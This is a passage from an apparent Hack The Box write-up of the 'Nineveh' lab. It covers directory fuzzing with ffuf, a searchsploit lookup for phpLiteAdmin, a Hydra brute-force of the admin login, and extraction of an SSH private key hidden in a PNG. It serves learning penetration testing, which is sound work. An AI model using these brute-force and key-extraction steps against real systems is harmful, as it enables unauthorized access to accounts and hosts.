Web
Nmap discovered a web server on the target port 443
Webroot
Fuzzing
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://$IP/FUZZ -ic -e .txt,.php,.html
________________________________________________
:: Method : GET
:: URL : https://10.10.10.43/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 49, Words: 3, Lines: 2, Duration: 31ms]
db [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 34ms]
secure_notes [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 179ms]
:: Progress: [882188/882188] :: Job [1/1] :: 576 req/sec :: Duration: [0:31:51] :: Errors: 0 ::
ffuf discovered 2 directories
/db/
It’s a login page for phpLiteAdmin.
The version information is shown: 1.9
It also somewhat indicates the installation directory of the web application;
This might be what was mentioned in the note earlier regarding DB interface improvement
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ searchsploit phpliteadmin 1.9
------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------ ---------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | php/webapps/39714.txt
------------------------------------------------ ---------------------------------
shellcodes: No Results
papers: No Results
searchsploit listed 2 items for PHPLiteAdmin 1.9
The first one seems quite promising, whereas the second one contains a list of XSS and HTML injections. It would still require authentication.
Brute-forcing with Hydra
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ hydra -l '' -P /usr/share/wordlists/rockyou.txt 'https-post-form://10.10.10.43:443/db/index.php:password=^PASS^&login=Log+In&proc_login=true:F=Incorrect password.'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 23:51:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&login=Log+In&proc_login=true:F=Incorrect password.
[443][http-post-form] host: 10.10.10.43 password: password123
Password found: password123
Admin Panel
I logged in to the admin GUI panel
/secure_notes/nineveh.png
Heading over to /secure_notes/ reveals an image.
This looks much like the secret folder mentioned in the note
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ curl -s --insecure https://10.10.10.43/secure_notes/nineveh.png -o nineveh.png
I will download the image with curl
Metadata
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ exiftool nineveh.png
exiftool version number : 12.54
file name : nineveh.png
directory : .
file size : 2.9 MB
file modification date/time : 2022:10:17 02:05:46+02:00
file access date/time : 2022:10:17 23:42:34+02:00
file inode change date/time : 2022:10:17 23:42:34+02:00
file permissions : -rw-r--r--
file type : PNG
file type extension : png
mime type : image/png
image width : 1497
image height : 746
bit depth : 8
color type : RGB
compression : Deflate/Inflate
filter : Adaptive
interlace : Noninterlaced
significant bits : 8 8 8
software : Shutter
warning : [minor] Trailer data after PNG IEND chunk
image size : 1497x746
megapixels : 1.1
Checking it with exiftool, it doesn’t look special in any way
strings
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ strings nineveh.png
IHDR
sBIT
tEXtSoftware
Shutterc
[...REDACTED...]
secret/
0000755
0000041
0000041
00000000000
13126060277
012377
ustar
www-data
www-data
secret/nineveh.priv
0000600
0000041
0000041
00000003213
13126045656
014730
ustar
www-data
www-data
-----BEGIN RSA PRIVATE KEY-----
[...REDACTED...]
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
It becomes special when I pull out ASCII strings with the strings command.
It contains an SSH private key for the amrois user.
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ nano id_rsa.amrois
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ chmod 600 id_rsa.amrois
I saved the key bit and set its permission to 600 for SSH use. The problem is that there is no SSH server to connect to.